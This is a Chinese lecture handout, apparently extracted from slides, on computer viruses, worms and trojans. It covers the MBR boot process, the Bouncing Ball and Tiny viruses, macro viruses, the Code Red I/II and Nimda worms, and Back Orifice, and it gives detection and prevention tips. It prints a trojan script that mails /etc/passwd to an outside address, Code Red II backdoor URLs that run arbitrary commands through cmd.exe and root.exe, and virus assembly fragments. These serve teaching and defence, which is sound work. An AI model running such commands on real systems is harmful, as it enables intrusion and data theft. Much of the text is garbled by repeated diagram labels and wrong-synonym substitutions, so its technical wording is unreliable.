計(jì)算機(jī)病毒、蠕蟲(chóng)和特洛伊木馬介紹網(wǎng)絡(luò)安全基礎(chǔ)課講義

1、計(jì)算機(jī)病毒、蠕蟲(chóng)和特洛伊木馬提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲(chóng)特洛伊木馬.計(jì)算機(jī)病毒病毒構(gòu)造模型病毒的分類(lèi)引導(dǎo)型病毒文件型病毒宏病毒病毒舉例病毒防備.計(jì)算機(jī)病毒的構(gòu)造傳染條件判別傳染代碼表現(xiàn)及破壞條件判別破壞代碼傳染模塊表現(xiàn)模塊.計(jì)算機(jī)病毒的分類(lèi)按攻擊平臺(tái)分類(lèi)：DOS,Win32，MAC，Unix按危害分類(lèi)：良性、惡性按代碼方式：源碼、中間代碼、目的碼按宿主分類(lèi)：引導(dǎo)型主引導(dǎo)區(qū)操作系統(tǒng)引導(dǎo)區(qū)文件型操作系統(tǒng)運(yùn)用程序宏病毒.引導(dǎo)型病毒引導(dǎo)記錄主引導(dǎo)記錄MBR55AA主引導(dǎo)程序(446字節(jié))分區(qū)1(16 字節(jié))主分區(qū)表(64字節(jié)分區(qū)2(16 字節(jié))分區(qū)3(16 字節(jié))分區(qū)4(16 字節(jié))終了標(biāo)志2字節(jié)引導(dǎo)代碼及

2、出錯(cuò)信息A.引導(dǎo)型病毒系統(tǒng)引導(dǎo)過(guò)程Power OnCPU & ROM BIOS InitializesPOST TestsLook for boot deviceMBR bootPartition Table LoadDOS Boot Sector RunsLoads IO.SYSMSDOS.SYSDOS Loaded.引導(dǎo)型病毒感染與執(zhí)行過(guò)程系統(tǒng)引導(dǎo)區(qū)引導(dǎo)正常執(zhí)行病毒病毒執(zhí)行病毒駐留帶毒執(zhí)行。病毒引導(dǎo)系統(tǒng)病毒體。.病毒的激活過(guò)程空閑區(qū)。內(nèi)存空間病毒進(jìn)入int8int21int2Fint4A時(shí)鐘中斷處置DOS中斷處置外設(shè)處置中斷實(shí)時(shí)時(shí)種警報(bào)中斷空閑區(qū)帶病毒程序空閑區(qū)空閑區(qū)正常程序病 毒int8

3、8int8空閑區(qū)正常程序正常程序。正常程序正常程序int8是26日？ 是,破壞！int8.舉例小球病毒Bouncing Ball)在磁盤(pán)上的存儲(chǔ)位置文件分配表病毒的第二部分000號(hào)扇區(qū)001號(hào)扇區(qū)第一個(gè)空簇FF7正常的引導(dǎo)扇區(qū)正常的引導(dǎo)扇區(qū)病毒的第一部分.感染后的系統(tǒng)啟動(dòng)過(guò)程啟動(dòng)將病毒程序的第一部分送入內(nèi)存高端將第二部分裝入內(nèi)存，與第一部分拼接在一同讀入真正的Boot 區(qū)代碼，送到0000:TC00處修正INT 13 中斷向量，指向病毒轉(zhuǎn)移到 0000:TC00處，開(kāi)場(chǎng)真正的系統(tǒng)引導(dǎo).觸

4、發(fā)條件修正后的INT 13進(jìn)入INT 13中斷能否為讀盤(pán)？執(zhí)行正常的INT 13程序執(zhí)行正常的INT 13程序N所讀盤(pán)能否是本身？Y修正INT8 開(kāi)場(chǎng)發(fā)作Y能否整點(diǎn)或半點(diǎn)Y執(zhí)行正常的INT 13程序Y能否帶病毒？N調(diào)用傳染過(guò)程感染磁盤(pán)N不發(fā)作執(zhí)行正常的INT 13程序N.病毒檢測(cè)原理特征匹配例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C: POP AXJMP F000AF1APUSHF行為監(jiān)控對(duì)中斷向量表的修正對(duì)引導(dǎo)記錄的修正對(duì).exe, 文件的寫(xiě)操作駐留內(nèi)存軟件模擬.防備與檢測(cè)數(shù)據(jù)備份不要用挪動(dòng)介質(zhì)啟動(dòng)設(shè)置CMOS選項(xiàng)設(shè)置CMOS的引導(dǎo)記錄維護(hù)選項(xiàng)安裝補(bǔ)丁，并及時(shí)更新安裝防

5、病毒軟件，及時(shí)更新病毒定義碼限制文件共享不隨便翻開(kāi)電子郵件的附件沒(méi)有病毒處置前不要運(yùn)用其他挪動(dòng)介質(zhì)不要運(yùn)轉(zhuǎn)不可信的程序挪動(dòng)介質(zhì)寫(xiě)維護(hù).文件型病毒文件構(gòu)造文件.EXE 文件PSP Header (256 bytes)Code, Data, StackSegment(s)(64K Bytes)代碼、數(shù)據(jù)、堆棧在通一段中在內(nèi)存中的是磁盤(pán)文件的鏡像 PSP Header (512 bytes)Code Segment(s)(64K )Data Segment(s)(64K )Stack Segment(s)(64K ).其他可執(zhí)行的文件類(lèi)型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.Vx

6、D.正常程序正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序

7、頭程序頭病毒程序程序頭病毒程序程序頭病毒程序程序頭病毒程序程序頭病毒程序程序頭病毒程序病毒程序病毒程序病毒程序正常程序程序頭程序頭文件型病毒感染機(jī)理.文件型病毒舉例最簡(jiǎn)單的病毒Tiny-32(32 bytes)尋覓宿主文件翻開(kāi)文件把本人寫(xiě)入文件封鎖文件MOV AH, 4E ;setup to find a fileINT 21;find the host fileMOV AX, 3D02;setup to open the host fileINT 21;open host fileMOV AH, 40;setup to write file to diskINT 21;write to fi

8、leDB *;what files to look for.宏病毒Macro Virus歷史：1980年，Dr. Fredrick Cohen and Ralf Burger 論文1994年，Microsoft Word 第一例宏病毒W(wǎng)ord, Excel, Access, , Project, Lotus AmiPro, Visio, Lotus 1-2-3, AutoCAD, Corel Draw.運(yùn)用數(shù)據(jù)文件進(jìn)展傳播，使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū)DOE ViRT 統(tǒng)計(jì)，85%的病毒感染歸因于宏病毒易于編寫(xiě)，只需求一兩天的時(shí)間，1015行代碼大量的用戶(hù)：90 Million

9、MS Office Users人們通常不交換程序，而交換數(shù)據(jù).宏病毒任務(wù)機(jī)理有毒文件.docNormal.dot激活autoopen宏寫(xiě)入無(wú)毒文件.docNormal.dot啟動(dòng)激活病毒.本卷須知Macro 可以存在模板里，也可以存在文檔里RTF文件也可以包含宏病毒經(jīng)過(guò)IE 閱讀器可以直接翻開(kāi)，而不提示下載.提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲(chóng)特洛伊木馬.蠕蟲(chóng)Worm一個(gè)獨(dú)立的計(jì)算機(jī)程序，不需求宿主自我復(fù)制，自主傳播Mobile占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序不偽裝成其他程序，靠自主傳播利用系統(tǒng)破綻；利用電子郵件無(wú)需用戶(hù)參與.莫里斯蠕蟲(chóng)事件發(fā)生于1988年，當(dāng)時(shí)導(dǎo)致大約6000臺(tái)機(jī)器癱瘓主要的攻擊方法Rsh

10、，rexec：用戶(hù)的缺省認(rèn)證Sendmail 的debug方式Fingerd的緩沖區(qū)溢出口令猜測(cè).CR I主要影響Windows NT系統(tǒng)和Windows 2000主要影響國(guó)外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計(jì)，至8月初曾經(jīng)感染超越25萬(wàn)臺(tái)主要行為利用IIS 的Index效力的緩沖區(qū)溢出缺陷進(jìn)入系統(tǒng)檢查c:notworm文件能否存在以判別能否感染中文維護(hù)是中文windows就不修正主頁(yè)攻擊白宮！.CR IIInspired by RC I影響涉及全球國(guó)內(nèi)影響尤其廣泛主要行為所利用缺陷一樣只感染windows2000系統(tǒng)，由于一些參數(shù)的問(wèn)題，只會(huì)導(dǎo)致NT死機(jī)休眠與掃描：中文windows，600個(gè)線程.Nimd

11、a 簡(jiǎn)介影響系統(tǒng)：MS win9x, wind2k, win XP傳播途徑：、文件共享、頁(yè)面閱讀、MS IIS目錄遍歷、Code Red 后門(mén)影響群發(fā)電子郵件，付病毒掃描共享文件夾，掃描有破綻的IIS, 掃描有Code Red后門(mén)的IIS Server.紅色代碼病毒紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制的蠕蟲(chóng)。2001年7月中旬，在美國(guó)等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對(duì)中文版windows系統(tǒng)，國(guó)內(nèi)大規(guī)模蔓延。經(jīng)過(guò)80端口傳播。只存在與網(wǎng)絡(luò)效力器的內(nèi)存，不經(jīng)過(guò)文件載體。利用IIS緩沖區(qū)溢出破綻2001年6月18日發(fā)布.CodeRed I在侵入一臺(tái)效力器

12、后，其運(yùn)轉(zhuǎn)步驟是：設(shè)置運(yùn)轉(zhuǎn)環(huán)境，修正堆棧指針，設(shè)置堆棧大小為218h字節(jié)。接著運(yùn)用RVA相對(duì)虛擬地址查找GetProcAddress的函數(shù)地址，然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址；假設(shè)C:notworm在，不再進(jìn)一步傳染；傳染其他主機(jī)。發(fā)明100個(gè)線程，其中99個(gè)用戶(hù)感染其他WEB效力器，被攻擊IP經(jīng)過(guò)一個(gè)算法計(jì)算得出；篡改主頁(yè)，假設(shè)系統(tǒng)默許言語(yǔ)為“美國(guó)英語(yǔ)，第100個(gè)進(jìn)程就將這臺(tái)效力的主頁(yè)改成“Welcome to worm !, Hacked By Chinese!，并繼續(xù)10個(gè)小時(shí)。這個(gè)修正直接在內(nèi)存中修正，而不是修正*.ht

13、m文件；假設(shè)時(shí)間在20：00UTC和23：59UTC之間，將反復(fù)和白宮主頁(yè)建立銜接，并發(fā)送98k字節(jié)數(shù)據(jù)，構(gòu)成DDOS攻擊。.CodeRed II添加了特洛依木馬的功能，并針對(duì)中國(guó)網(wǎng)站做了改良計(jì)算IP的方法進(jìn)展了修正，使病毒傳染的更快；檢查能否存在CodeRedII原子，假設(shè)存在那么進(jìn)入睡眠形狀防止反復(fù)感染，假設(shè)不存在那么創(chuàng)建CodeRedII原子；創(chuàng)建300個(gè)線程進(jìn)展傳染，假設(shè)系統(tǒng)默許言語(yǔ)為簡(jiǎn)體中文或繁體中文，那么創(chuàng)建600個(gè)線程；檢查時(shí)間。病毒作者的意圖是傳播過(guò)程在2001年10月1日完成，之后，蠕蟲(chóng)會(huì)迸發(fā)而使系統(tǒng)不斷重新啟動(dòng)。在系統(tǒng)中安裝一個(gè)特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS

14、的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的木馬解緊縮寫(xiě)到C盤(pán)和D盤(pán)的explorer.exe木馬每次系統(tǒng)和啟動(dòng)都會(huì)運(yùn)轉(zhuǎn)，制止系統(tǒng)的文件維護(hù)功能，并將C盤(pán)和D盤(pán)經(jīng)過(guò)web效力器共享.CodeRed II攻擊方式x.x.x.x/c/inetpub/scripts/root.exe?/c+dirx.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻擊的IP地址，dir可以是恣意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送數(shù)據(jù)等，這個(gè)后門(mén)后來(lái)也成為了nimda病毒的一個(gè)傳播方式。 下面是cert/cc上提供的被攻擊效力器日志(CA-2001-11)

15、 2001-05-06 12:20:19 0 - 0 80 GET /scripts/././winnt/system32/cmd.exe /c+dir 200 2001-05-06 12:20:19 0 - 0 80 GET /scripts/././winnt/system32/cmd.exe /c+dir+. 200 .紅色代碼病毒的檢測(cè)和防備針對(duì)安裝IIS的windows系統(tǒng)；能否出現(xiàn)負(fù)載顯著添加CPU/網(wǎng)絡(luò)的景象；用netstat an檢查能否有許多對(duì)外的80端口銜接在web日志中檢查能否有/default.ida?xxx.%u0078%u0000 u00=a /1.0這樣的攻擊記錄

16、；查找系統(tǒng)中能否存在文件c:explorer.exe或d:explorer.exe以及root.exe；檢查注冊(cè)表文件中能否添加了C和D虛擬目錄，以及文件維護(hù)功能能否被制止。在義務(wù)管理器中檢查能否存在兩個(gè)explorer.exe進(jìn)程。.提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲(chóng)特洛伊木馬.特洛伊木馬名字來(lái)源：古希臘故事經(jīng)過(guò)偽裝成其他程序、有意隱藏本人惡意行為的程序，通常留下一個(gè)遠(yuǎn)程控制的后門(mén)沒(méi)有自我復(fù)制的功能非自主傳播用戶(hù)自動(dòng)發(fā)送給其他人放到網(wǎng)站上由用戶(hù)下載.最簡(jiǎn)單的木馬舉例ls#!/bin/sh/bin/mail myaddresstest /etc/passwdlsPATH=./ :/usr/local/sb

17、in:/usr/local/bin:/sbin:/bin:/usr/sbin.特洛依木馬舉例Back OrificeCult of the Dead Cow在1998年8月發(fā)布, 公開(kāi)源碼軟件，遵守GPL，是功能強(qiáng)大的遠(yuǎn)程控制器木馬。boserver.exe、boconfig.exe、bogui.exe在BO效力器上啟動(dòng)、停頓基于文本的運(yùn)用程序目錄和文件操作。包括創(chuàng)建、刪除、查看目錄、查找、解壓、緊縮。共享。創(chuàng)建共享資源HTTP效力。啟動(dòng)或停頓HTTP效力。擊鍵記錄。將BO效力器上用戶(hù)的擊鍵記錄在一個(gè)文本文件中，同時(shí)記錄執(zhí)行輸入的窗口名?？梢垣@得用戶(hù)口令.特洛依木馬視頻輸入、播放。捕捉效力器屏

18、幕到一個(gè)位圖文件中。網(wǎng)絡(luò)銜接。列出和斷開(kāi)BO效力器上接入和接出的銜接，可以發(fā)起新銜接。查看信息。查看一切網(wǎng)絡(luò)端口、域名、效力器和可見(jiàn)的共享“出口。前往系統(tǒng)信息，包括機(jī)器名、當(dāng)前用戶(hù)、CPU類(lèi)型、內(nèi)存容量及可用內(nèi)存、Windows版本、驅(qū)動(dòng)器類(lèi)型、硬盤(pán)容量及運(yùn)用空間。端口重定向。注冊(cè)表鎖住或重啟計(jì)算機(jī)。傳輸文件.特洛依木馬運(yùn)用netstat a 檢查能否還有未知端口監(jiān)聽(tīng)(默許31337)檢測(cè)和刪除注冊(cè)表HLMsoftwaremicrosoftwindowscurrentVersionrunservices鍵值，能否有“Name Data.exe，假設(shè)有那么刪除C:windowssystem目錄：刪除“ .exe文件和windll.dll文件.特洛依木馬其他木馬國(guó)外subsever、dagger 、ACKcmdC、DeepThroat、SatansB